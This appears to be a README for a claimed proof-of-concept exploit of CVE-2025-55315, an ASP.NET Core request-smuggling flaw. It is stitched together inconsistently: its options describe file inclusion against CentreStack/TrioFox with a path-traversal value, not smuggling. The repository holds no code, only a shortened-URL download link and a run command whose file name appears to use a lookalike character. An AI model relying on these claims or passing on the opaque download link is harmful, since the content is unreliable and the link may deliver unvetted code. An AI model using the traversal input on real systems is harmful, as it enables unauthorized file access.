Introduction
# CVE-2025-55315
### Overview
A critical vulnerability in ASP.NET Core involving inconsistent interpretation of HTTP requests, which enables HTTP request/response smuggling. The flaw affects ASP.NET Core versions 2.3, 8.0, and 9.0, allowing an authorized attacker to bypass security features over a network.
### Versions
- ASP.NET Core 8.0
- ASP.NET Core 9.0
- ASP.NET Core 2.3
- Microsoft Visual Studio 2022 Version 17.12
### Published Date
14 October 2025
### Key Points
- **Severity**: Critical
- **CVSS Score**: 9.9 (High)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low
- **Privileges Required**: Low
### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)
### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the exploit: `python explоit.py --target <target_url> --file "/path/to/Web.config"`
### How It Works
An attacker with low-privilege network access can:
- Bypass front-end security controls
- View sensitive data including user credentials
- Modify server files
- Potentially hijack user sessions
- Breach security boundaries between system components

The vulnerability has a high severity with significant impacts on confidentiality, integrity, and potential unauthorized access.

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.
### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-55315 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.
### PoC exploit download [here](https://tinyurl.com/3rht2j66)
File snapshot
[4.0K] /data/pocs/669ee8be604754317b1d06b78485a11aad02f470
└── [2.0K] README.md
0 directories, 1 file